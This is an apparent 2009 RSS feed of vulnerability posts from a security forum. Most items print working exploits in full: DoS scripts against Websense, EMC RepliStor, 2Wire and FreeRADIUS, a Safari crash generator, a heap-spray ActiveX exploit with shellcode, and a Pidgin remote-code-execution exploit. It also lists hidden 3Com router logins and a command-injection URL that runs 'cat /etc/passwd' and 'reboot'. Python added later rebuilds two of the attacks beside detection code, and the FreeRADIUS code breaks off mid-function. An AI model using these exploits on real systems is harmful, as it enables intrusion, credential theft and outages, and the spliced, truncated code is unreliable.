<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
	<title>Last 10 Vulnerabilities</title>
	<description></description>
	<link>http://www.governmentsecurity.org/forum/index.php</link>
	<pubDate>Tue, 10 Nov 2009 07:56:26 +0000</pubDate>
	<ttl>1</ttl>
	<item>
		<title><![CDATA[Palm Pre Webos Version &#60;= 1.1 Floating Point Exception]]></title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32237</link>
		<description><![CDATA[<pre class='prettyprint'>
I.  Description 

The Palm Pre WebOS version &lt;= 1.1 suffers from a floating point exception vulnerability when 
attempting to view a specially crafted web page. This vulnerability has been addressed in the latest 
patch from Palm and all users are recommended to update to WebOS version 1.2+. 

II.  Impact 

If a user views a malicious web page that contains specially crafted data, the "LunaSysMgr" process 
will crash, causing the device to simulate a reboot.  The bug itself is a floating point exception 
that crashes the "LunaSysMgr" process and forces the device to restart the process, simulating a 
reboot of the system.  At the time of the discovery, the greatest risk to the system was a denial of 
service condition. 

The crash does not occur when viewing the malicious web page while in landscape mode. 

III. Proof of Concept 

The Palm Pre WebOS version &lt;= 1.1 will crash upon opening a web page that contains 50,280 bytes of 
data or greater and attempts to refresh the page.  Upon viewing the malicious web page the 
LunaSysMgr process will generate a floating point exception and simulate a system "reboot". 

The following code will trigger the issue 

"&lt;meta http-equiv="refresh" content="1"&gt;AAAAA..." using 50280 or more characters after the refresh. 

IV. About 

This vulnerability was discovered by Townsend Ladd Harris &lt;PalmPreHacker &#91;a t&#93; gmail.com&gt; 

Vulnerability details will be posted at: 
http://tlhsecurity.blogspot.com/2009/10/palm-pre-webos-version-11-floating.html
</pre>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:56:26 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32237</guid>
	</item>
	<item>
		<title>3Com Officeconnect Firewall/router Multiple Remote Vulnerabilities</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32236</link>
		<description><![CDATA[<pre class='prettyprint'>
************************************************************** 
Product: 3Com OfficeConnect Firewall/Router 
Website: http://www.3com.com/ 
Discovered By: Andrea Fabrizi 
Email: andrea.fabrizi@gmail.com 
Web: http://www.andreafabrizi.it 
Vuln: remote command execution and password disclosure 
************************************************************** 

####### Admin password disclosure ####### 

1) SSH/Telnet to router using one of these hidden accounts: 
  support:support 
  user:5 
  nobody:admin 
2) Type 9 
3) Type 1 
4) Type 3 to dump the configuration 
5) Locate the sysPassword field: 
   &lt;sysPassword value="cXdlcnR5Cg=="/&gt; 
6) Decode the admin password: 
  roland@hp6720s:~$ echo -ne "cXdlcnR5Cg==" | base64 -d 
  qwerty 


####### Remote command execution  ####### 

http://1.2.3.4/utility.cgi?testType=1&IP=aaa || cat /etc/passwd 

To see the command output you need to log into the router; however, the 
command is executed even if the user is not logged in, so if you don't 
have access to the device a DoS is also possible: 

http://1.2.3.4/utility.cgi?testType=1&IP=aaa || reboot
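
The two steps above (decode the base64 sysPassword from a dumped config, then inject through the IP parameter of utility.cgi) in Python, as an added example that is not part of Andrea Fabrizi's advisory. It also adds the check a defender would want: a scan of web-server access-log lines for utility.cgi requests whose IP parameter is not a bare address. The access-log format, the sample log lines and the config fragment are constructed for this example; the regexes, the allowlist and the function names are assumptions of the example, not anything the 3Com firmware exposes.

```python
import base64
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Matches the field the advisory points at in the dumped config, e.g. sysPassword value="cXdlcnR5Cg=="
SYS_PASSWORD_RE = re.compile(r'sysPassword\s+value="([A-Za-z0-9+/=]*)"')

# Apache/combined-style access log line. The format is an assumption of this example,
# not something the advisory gives; adapt the regex to whatever the proxy or router logs.
LOG_LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def extract_admin_password(config_dump):
    """Return the admin password stored base64-encoded in sysPassword.

    The advisory's sample value decodes to the six characters qwerty followed by a newline;
    the newline is part of the stored value, not of the password, so strip line endings.
    """
    m = SYS_PASSWORD_RE.search(config_dump)
    if m is None:
        raise ValueError("no sysPassword field in dump")
    return base64.b64decode(m.group(1)).decode("utf-8", "replace").rstrip("\r\n")


def rce_url(host, command):
    """Build the utility.cgi request. The advisory shows the URL unencoded; urlencode()
    percent-encodes the spaces and pipes so the request survives a proxy or an HTTP
    library that rejects raw metacharacters in the query string."""
    query = urlencode({"testType": "1", "IP": "aaa || " + command})
    return "http://%s/utility.cgi?%s" % (host, query)


def is_injection_attempt(path_and_query):
    """Detection side: utility.cgi is a ping-style test page, so the IP parameter should only
    ever be a bare hostname or address. Anything else (spaces, pipes, semicolons, backticks)
    is treated as an injection attempt. Allowlist, not a metacharacter blocklist."""
    parts = urlsplit(path_and_query)
    if not parts.path.endswith("/utility.cgi"):
        return False
    ip = parse_qs(parts.query).get("IP", [""])[0]
    return re.fullmatch(r"[A-Za-z0-9.:\-]+", ip) is None


def scan_log(text):
    """Return (client, request_path) for every access-log line that looks like a utility.cgi injection."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE_RE.match(line)
        if m and is_injection_attempt(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits


# Constructed sample log, not taken from the advisory: one legitimate ping test, one injected reboot.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Nov/2009:07:53:36 +0000] "GET /utility.cgi?testType=1&IP=8.8.8.8 HTTP/1.1" 200 512
10.0.0.9 - - [10/Nov/2009:07:54:01 +0000] "GET /utility.cgi?testType=1&IP=aaa%20%7C%7C%20reboot HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    # Constructed config fragment carrying the advisory's sample value.
    sample_dump = 'sysPassword value="cXdlcnR5Cg=="'
    print("admin password:", extract_admin_password(sample_dump))
    print("rce url:", rce_url("1.2.3.4", "cat /etc/passwd"))
    for client, path in scan_log(SAMPLE_LOG):
        print("injection attempt from", client, "->", path)
```

The allowlist in is_injection_attempt() is deliberately narrow: a ping target is a hostname or an address, so anything with a space or shell metacharacter is suspicious regardless of which command follows, and the detector does not have to enumerate payloads.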

</pre>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:53:36 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32236</guid>
	</item>
	<item>
		<title>Emc Replistor Server (Rep_Serv.exe) 6.3.1.3 Remote Dos</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32235</link>
		<description><![CDATA[<pre class='prettyprint'>
&lt;?php
    /*
    EMC RepliStor Server (rep_serv.exe) 6.3.1.3 remote denial of
    service poc
    by Nine:Situations:Group::bellick
     
    */
     
    $host = "192.168.0.1";
    $port = 7144;
     
    $_sock = fsockopen($host, $port, $errno, $errstr, 2);
    if (!$_sock) {
        echo "$errstr ($errno)&#092;n";
    } else {
        $_p = "&#092;x54&#092;x93&#092;x00&#092;x00&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41". "&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41&#092;x41".
"&#092;x41&#092;x41&#092;x41&#092;x41";
        fputs($_sock, $_p);
        fclose($_sock);
    }
?&gt;

original url: http://retrogod.altervista.org/9sg_emc_repli_crash.html

</pre>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:51:37 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32235</guid>
	</item>
	<item>
		<title>Websense Email Security Web Administrator Dos</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32234</link>
		<description><![CDATA[<pre class='prettyprint'>
Advisory ID:            NSOADV-2009-002 
Found Date:             28.09.2009 
Date Reported:          01.10.2009 
Release Date:           20.10.2009 
Author:                 Nikolas Sotiriu 
Mail:                   nso-research (at) sotiriu.de 
URL:                    http://sotiriu.de/adv/NSOADV-2009-002.txt 
Vendor:                 Websense (http://www.websense.com/) 
Affected Products:      Websense Email Security v7.1 
                        Personal Email Manager v7.1 
Not Affected Products:  Websense Email Security v7.1 Hotfix 4 
                        Personal Email Manager v7.1 Hotfix 4 
Remote Exploitable:     Yes 
Local Exploitable:      Yes 
Patch Status:           Patched with Hotfix 4 
Disclosure Policy:      http://sotiriu.de/policy.html 
Thanks to:              Thierry Zoller: for the permission to use his 
                                        Policy 



Background: 
=========== 

Websense Email Security software incorporates multiple layers of 
real-time Web security and data security intelligence to provide 
leading email protection from converged email and Web 2.0 threats. 
It helps to manage outbound data leaks and compliance risk, and enables 
a consolidated security strategy with the trusted leader in Essential 
Information Protection. 

(Product description from Websense Website) 

The Websense Email Security Web Administrator is a webfrontend, which 
enables you to access the message administration, directory management 
and to view the log. 



Description: 
============ 

The Web Administrator frontend (STEMWADM.EXE) listens by default on port 
TCP/8181. 

If an attacker sends an HTTP request to port 8181 without waiting for a 
response, the web server crashes. The proof of concept script just sends 
a "GET /index.asp" and closes the socket. The server cannot respond 
to the request anymore and dies. 

By default the service will always restart after a crash, so the PoC 
keeps sending the request until it is stopped. 



Proof of Concept : 
================== 

#!/usr/bin/perl 
use Socket; 

(($target = $ARGV&#91;0&#93;) && ($port = $ARGV&#91;1&#93;)) || die "Usage: $0 ", 
"&lt;target&gt; &lt;port&gt; &#092;n"; 

print "&#092;nThe Webserver on http://$target:$port should be dead until", 
"this script is running&#092;n"; 

while (1) { 
$ip = inet_aton($target) || die "host($target) not found.&#092;n"; 
$sockaddr = pack_sockaddr_in($port, $ip); 
socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "socket error.&#092;n"; 

connect(SOCKET, $sockaddr) || die "connect $target $port error.&#092;n"; 

print SOCKET "GET /index.asp"; 
print "Request sent ...&#092;n"; 

close(SOCKET); 

sleep 1; 

}; 

</pre>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:50:27 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32234</guid>
	</item>
	<item>
		<title>Everfocus Edr1600 Remote Authentication Bypass</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32233</link>
		<description><![CDATA[<pre class='prettyprint'>
************************************************************** 
Product: &#91;b&#93;Everfocus EDR1600&#91;/b&#93; 
Version affected: all 
Website: http://www.everfocus.com/ 
Discovered By: Andrea Fabrizi 
Email: andrea.fabrizi@gmail.com 
Web: http://www.andreafabrizi.it 
Vuln: remote DVR authentication bypass 
************************************************************** 

The EDR1600 firmware does not correctly handle user authentication and sessions. 

This exploit lets you connect to any remote DVR (without username 
and password) and see the live cams :) 

Exploit: http://www.andreafabrizi.it/files/EverFocus_edr1600_Exploit.tar.gz

</pre>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:48:42 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32233</guid>
	</item>
	<item>
		<title>2Wire Remote Denial Of Service</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32232</link>
		<description><![CDATA[<pre class='prettyprint'>
======================================== 
        2WIRE REMOTE DENIAL OF SERVICE 
======================================== 


Device:      2wire Gateway Router/Modem 
Vulnerable Software:   &lt;= 5.29.52 
Vulnerable Models:   1700HG 
        1701HG 
        1800HW 
        2071 
        2700HG 
        2701HG-T 
Release Date:    2009-10-29 
Last Update:    2009-09 
Critical:    Moderately critical 
Impact:    Denial of service 
     Remote router reboot 
Where:      From remote 
     In the remote management interface 
Solution Status:   Vendor issued firmware patches 
        Providers are in charge of applying the patches 
WebVuln Advisory:   1-003 


 BACKGROUND 
======================= 

The remote management interface of some 2wire modems is enabled by 
default. 
This interface runs over SSL on port 50001 with an untrusted issuer 
certificate. 

++ (Spanish original, translated) 
Some 2wire modems have the remote interface enabled by default. 
The interface uses SSL with an invalid certificate on port 50001. 


  DESCRIPTION 
======================= 

Some 2wire modems are vulnerable to a remote denial of service attack. 
By requesting a special URL from the Remote Management interface, an 
unauthenticated user can remotely reboot the complete device. 

++ (Spanish original, translated) 
Some 2wire modems are vulnerable to a denial of service attack. 
An unauthenticated user can reboot the device by sending a request to 
the remote management interface. 


 EXPLOIT / POC 
======================= 

https://&lt;remoteIP&gt;:50001/xslt?page=%0d%0a 


 WORKAROUND 
======================= 

Disable Remote Management in Firewall -&gt; Advanced Settings. 

++ (Spanish original, translated) 
Disable Remote Management under Firewall -&gt; Advanced Settings. 


  DISCLOSURE TIMELINE 
======================= 

2009/09/06 - Vulnerability discovered 
2009/09/08 - Vendor contacted 


                 ======================= 

                          h k m 
                       hkm@hakim.ws 

</pre>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:45:21 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32232</guid>
	</item>
	<item>
		<title>Safari 4.0.3 (Win32) Css Remote Denial Of Service Exploit</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32231</link>
		<description><![CDATA[<pre class='prettyprint'>
#!/usr/bin/perl
# ithinkthereforeiexist.pl
# AKA
# Safari 4.0.3 (Win32) CSS Remote Denial of Service Exploit
#
# Jeremy Brown &#91;0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com&#93; 11.09.2009
#
# *********************************************************************************************************
# Another remotely triggerable STACK_OVERFLOW in Safari on Windows...
#
# (204.72c): Stack overflow - code c00000fd (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=000333d8 ebx=000fbd16 ecx=00000000 edx=037b3fd0 esi=037b3fd0 edi=0001bfad
# eip=00ae19af esp=00032ea8 ebp=00032f28 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:&#092;Program Files&#092;Safari&#092;CoreFoundation.dll - 
# CoreFoundation!_CFStringEncodeByteStream+0x2d:
# 00ae19af 8365b800        and     dword ptr &#91;ebp-48h&#93;,0 ss:0023:00032ee0=00000000
#
# A product of Browser Fuzzer 3 :)
#
# "We do it in the dark, with smiles on our faces"
#
# *********************************************************************************************************
# ithinkthereforeiexist.pl

$html = "ithinkthereforeiexist.html";
$css  = "ithinkthereforeiexist.css";

$size = 114600;

$htmldata = "&lt;html&gt;&#092;n&lt;head&gt;&#092;n&lt;link rel=&#092;"stylesheet&#092;" href=&#092;"" . $css . "&#092;" /&gt;&#092;n&lt;/head&gt;&#092;n";
$htmldata = $htmldata . "&lt;body&gt;&#092;n&lt;div id=&#092;"die&#092;"&gt;&#092;n&lt;/div&gt;&#092;n&lt;/body&gt;&#092;n&lt;/html&gt;";

$cssdata = "#die&#092;n{&#092;nbackground: url(" . "A" x $size . ");&#092;n}";

     open(FD, '&gt;' . $html);
     print FD $htmldata;
     close(FD);

     open(FD, '&gt;' . $css);
     print FD $cssdata;
     close(FD);


</pre>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:38:08 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32231</guid>
	</item>
	<item>
		<title>Quiksoft Easymail 6 (Addattachment) Remote Buffer Overflow Exploit</title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32230</link>
		<description><![CDATA[<pre class='prettyprint'>
&lt;html&gt;
&lt;head&gt;
    &lt;!--
      -- Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit
      -- 
      -- Its old and the latest version doesn't support this method. 
      -- I was bored and a similar post sparked my interest. 
      -- 
      -- Advisory: http://www.bmgsec.com.au/advisory/48/
      -- 
      -- Written by:
      -- bmgsec (bmgsec &#91;at&#93; gmail.com / www.bmgsec.com.au)
      --  --&gt;
 &lt;title&gt;Quiksoft EasyMail 6 (AddAttachment) Remote Buffer Overflow Exploit&lt;/title&gt;
&lt;object classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9' id='test'&gt;&lt;/object&gt;
&lt;script language='j&#097;v&#097;script'&gt;
       function str_repeat ( input, multiplier ) {
               return new Array(multiplier+1).join(input);
       }

       //windows/exec CMD: calc Size: 144 bytes Encoder: x86/shikata_ga_nai ExitFunc: SEH
       shellcode = unescape("%uc931%u1eb1%ue2b8%udc1f%ud9cc%ud9e5%u2474%u5bf4%u4331%u830f%ufceb"+
                            "%u4303%ufde9%u3029%u4505%uc9d2%ucdd5%uf597%uad5e%u7e12%ua161%u3196"+
                            "%ub679%uedf6%u2378%u6541%u384e%u9753%ufe9f%ucbcd%u3e5b%u1499%u75a2"+
                            "%u1a6f%u61e6%u2784%u51b2%u2d61%u11df%ue936%ucd1e%u7aaf%u5a2c%u22bb"+
                            "%u5d30%u5750%ud654%u83a7%ub4ed%u5783%u1b2e%ua1fd%uf2d0%uc699%ucb56"+
                            "%u99ea%ua05a%u059d%u3dcf%u3e35%uba86%ufe45%u6af2%u0f22%u8f88%u87ed"+
                            "%u7114%u569b%u7173%u057b%ue11a%ucae7");

       bigblock = unescape("%u9090%u9090");
       headersize = 20;
       slackspace = headersize + shellcode.length;

       while (bigblock.length &lt; slackspace)
               bigblock += bigblock;

       fillblock = bigblock.substring(0, slackspace);
       block = bigblock.substring(0, bigblock.length - slackspace);

       while (block.length + slackspace &lt; 200000)
               block = block + block + fillblock;

       memory = new Array();
       for (i=0; i&lt;500; i++)
               memory&#91;i&#93; = block + shellcode;

       buffer = str_repeat('A', 433);
       buffer += "BBBB";
       buffer += str_repeat(unescape("%0b%0b%0b%0b"), 63);

       test.AddAttachment(buffer, 1);
&lt;/script&gt;
&lt;/head&gt;
&lt;/html&gt;

</pre><br />
<br />
Source: <a href='http://www.milw0rm.com/exploits/9705' class='bbc_url' title='External link' rel='nofollow external'>http://www.milw0rm.com/exploits/9705</a>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:36:40 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32230</guid>
	</item>
	<item>
		<title><![CDATA[Pidgin Msn &#60;= 2.5.8 Remote Code Execution Exploit]]></title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32229</link>
		<description><![CDATA[<pre class='prettyprint'>
/*
* Pidgin MSN &lt;= 2.5.8 Remote Code Execution
*
* Pierre Nogues - pierz@hotmail.it
* http://www.indahax.com/
*
*
* Description:
*        Pidgin is a multi-protocol Instant Messenger.
*
*        This is an exploit for the vulnerability&#91;1&#93; discovered in Pidgin by core-security&#91;2&#93;.
*        The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets
*        which could lead to memory corruption.
*
* Affected versions :
*        Pidgin &lt;= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.
*
* Platforms :
*        Windows, Linux, Mac
*
* Fix :
*        Fixed in Pidgin 2.5.9
*        Update to the latest version : http://www.pidgin.im/download/
*
* References :
*        &#91;1&#93; http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
*        &#91;2&#93; http://www.coresecurity.com/content/libpurple-arbitrary-write
*        &#91;3&#93; http://www.pidgin.im/news/security/?id=34
*
* Usage :
*        You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
*        javac.exe -cp "%classpath%;.&#092;jml-1.0b3-full.jar" PidginExploit.java
*        java -cp "%classpath%;.&#092;jml-1.0b3-full.jar" PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
*
*/

import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;

public class PidginExploit {

   private MsnMessenger messenger;
   private String login;
   private String password;
   private String target;

   private int session_id = NumberUtils.getIntRandom();

   private byte shellcode&#91;&#93; = new byte&#91;&#93; {

           /*
            * if you use the stack in your shellcode do not forget to change esp, because eip == esp == kaboom!
            * sub esp,500
            */
               (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,


           /*
            * windows/exec - 121 bytes
            * http://www.metasploit.com
            * EXITFUNC=process, CMD=calc.exe
            */
               (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
               (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
               (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
               (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
               (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
               (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
               (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
               (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
               (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
               (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
               (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
               (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
               (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
               (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
               (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
               (byte) 0x00
           };

   // reteip = pointer to the return address in the stack
   // The shellcode will be written just before reteip
   // and reteip will automatically point to the shellcode. It's magic!
   private int reteip = 0x0022CFCC;    //stack on XP SP3-FR Pidgin 2.5.8

   private int neweip;
   private byte&#91;&#93; payload = new byte&#91;shellcode.length + 4&#93;;
   private int totallength = reteip + 4;

   public static void main(String&#91;&#93; args) throws Exception {

       if(args.length != 3){
           System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");
       }else{
           PidginExploit exploit = new PidginExploit(args&#91;0&#93;,args&#91;1&#93;,args&#91;2&#93;);
           exploit.start();
       }

   }

   public PidginExploit(String login, String password, String target){
       this.login = login;
       this.password = password;
       this.target = target;

       neweip = reteip - shellcode.length ;

       for(int i=0;i&lt;shellcode.length;i++)
           payload&#91;i&#93; = shellcode&#91;i&#93;;

       payload&#91;shellcode.length&#93; = (byte)(neweip & 0x000000FF);
       payload&#91;shellcode.length + 1&#93; = (byte)((neweip & 0x0000FF00) &gt;&gt; 8);
       payload&#91;shellcode.length + 2&#93; = (byte)((neweip & 0x00FF0000) &gt;&gt; 16);
       payload&#91;shellcode.length + 3&#93; = (byte)((neweip & 0xFF000000) &gt;&gt; 24);
   }

   public void start() {
       messenger = MsnMessengerFactory.createMsnMessenger(login,password);
       messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);

       messenger.setLogIncoming(false);
       messenger.setLogOutgoing(false);

       initMessenger(messenger);
       messenger.login();
   }

   protected void initMessenger(MsnMessenger messenger) {

   messenger.addContactListListener(new MsnContactListAdapter() {

           public void contactListInitCompleted(MsnMessenger messenger) {

               final Object id = new Object();

               messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {

                   public void switchboardStarted(MsnSwitchboard switchboard) {

                       if (id != switchboard.getAttachment())
                           return;

                       switchboard.inviteContact(Email.parseStr(target));
                   }

                   public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
                       if (id != switchboard.getAttachment())
                           return;

                       MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
                       msg.setIdentifier(NumberUtils.getIntRandom());
                       msg.setSessionId(session_id);
                       msg.setOffset(0);
                       msg.setTotalLength(totallength);
                       msg.setCurrentLength(totallength);

                       // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null
                       // We'll use this buffer to rewrite memory in the stack
                       msg.setFlag(0x1000020);

                       msg.setP2PDest(target);

                       switchboard.sendMessage(msg);

                       System.out.println("First packet sent, waiting for the ACK");

                   }

                   public void switchboardClosed(MsnSwitchboard switchboard) {
                       System.out.println("switchboardClosed");
                       switchboard.getMessenger().removeSwitchboardListener(this);
                   }

                   public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){
                       System.out.println("contactLeaveSwitchboard");
                   }
               });
               messenger.newSwitchboard(id);
           }
       });

       messenger.addMessageListener(new MsnMessageAdapter(){

           public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {

               //We receive the ACK of our first packet with the ID of the new bogus packet
               message.getIdentifier();

               MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
                       payload.length, payload, target);

               switchboard.sendMessage(msg);
               System.out.println("ACK received && Payload sent !");
               System.out.println("Exploit OK ! CTRL+C to quit");

           }
       });



       messenger.addMessengerListener(new MsnMessengerAdapter() {

           public void loginCompleted(MsnMessenger messenger) {
               System.out.println(messenger.getOwner().getEmail() + " login");
           }

           public void logout(MsnMessenger messenger) {
               System.out.println(messenger.getOwner().getEmail() + " logout");
           }

           public void exceptionCaught(MsnMessenger messenger,
                   Throwable throwable) {
               System.out.println("caught exception: " + throwable);
           }
       });

   }
}


</pre><br />
<br />
Source: <a href='http://www.milw0rm.com/exploits/9615' class='bbc_url' title='External link' rel='nofollow external'>http://www.milw0rm.com/exploits/9615</a>]]></description>
		<pubDate>Tue, 10 Nov 2009 07:35:29 +0000</pubDate>
		<guid>http://www.governmentsecurity.org/forum/index.php?showtopic=32229</guid>
	</item>
	<item>
		<title><![CDATA[Freeradius &#60; 1.1.8 Remote Packet Of Death Exploit (Cve-2009-3111)]]></title>
		<link>http://www.governmentsecurity.org/forum/index.php?showtopic=32228</link>
		<description><![CDATA[<pre class='prettyprint'>
#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11
# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py
# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/

import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr

if len(sys.argv) != 2:
	print "Usage: radius_killer.py &lt;radiushost&gt;&#092;n"
	sys.exit(1)

PoD=IP(dst=sys.argv&#91;1&#93;)/UDP(sport=60422,dport=1812)/ &#092;
	Radius(code=1,authenticator="&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99&#092;x99",id=180)/ &#092;
	RadiusAttr(type=69,value="",len=2)

send(PoD)
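
The scapy lines above build an Access-Request whose single attribute is Tunnel-Password (type 69) with a Length of 2, i.e. an empty value, which is what CVE-2009-3111 is about. The following is an added example, not part of Matthew Gillespie's script: it builds the same 22-byte datagram with struct only (no scapy or RadiusAttr needed) and parses it back with the length check a defensive decoder should make before it ever touches the attribute, so the same code doubles as a detector for malformed Tunnel-Password attributes in captured traffic. The minimum-length table (5 octets for Tunnel-Password, from RFC 2868's Tag plus two-octet Salt), the function names and the second, well-formed sample packet are this example's own.

```python
import socket
import struct

ACCESS_REQUEST = 1
TUNNEL_PASSWORD = 69                # RFC 2868 s3.5: Type, Length, Tag, 2-octet Salt, String; Length at least 5
HEADER = struct.Struct("!BBH16s")   # Code, Identifier, Length, Request Authenticator (RFC 2865 s3)

# Minimum legal attribute length per type; anything not listed falls back to the bare TLV minimum of 2.
MIN_ATTR_LEN = {TUNNEL_PASSWORD: 5}


def build_packet(code, identifier, authenticator, attributes):
    """Assemble a RADIUS packet from (type, value) pairs; each TLV's Length octet covers itself."""
    body = b"".join(struct.pack("!BB", t, 2 + len(v)) + v for t, v in attributes)
    return HEADER.pack(code, identifier, HEADER.size + len(body), authenticator) + body


def packet_of_death(identifier=180, authenticator=b"\x99" * 16):
    """The advisory's packet without scapy: an Access-Request whose only attribute is a
    Tunnel-Password with Length 2, i.e. no tag, no salt, no string."""
    return build_packet(ACCESS_REQUEST, identifier, authenticator, [(TUNNEL_PASSWORD, b"")])


def parse_attributes(packet):
    """Walk the TLV list and return [(type, length, value)]. Raises ValueError on a truncated
    packet, a Length that cannot cover its own two header octets, or trailing garbage."""
    code, identifier, length, authenticator = HEADER.unpack_from(packet)
    if length > len(packet) or HEADER.size > length:
        raise ValueError("packet shorter than its Length field")
    attrs, pos = [], HEADER.size
    while length - pos >= 2:
        t, l = packet[pos], packet[pos + 1]
        if l in (0, 1) or pos + l > length:
            raise ValueError("attribute length %d at offset %d is malformed" % (l, pos))
        attrs.append((t, l, packet[pos + 2:pos + l]))
        pos += l
    if pos != length:
        raise ValueError("trailing byte after last attribute")
    return attrs


def is_packet_of_death(packet):
    """True if the packet fails the check a defensive decoder should make before decrypting
    Tunnel-Password: broken TLV framing, or an attribute shorter than its type-specific
    minimum. The zero-length Tunnel-Password from the advisory is exactly that case."""
    try:
        attrs = parse_attributes(packet)
    except ValueError:
        return True
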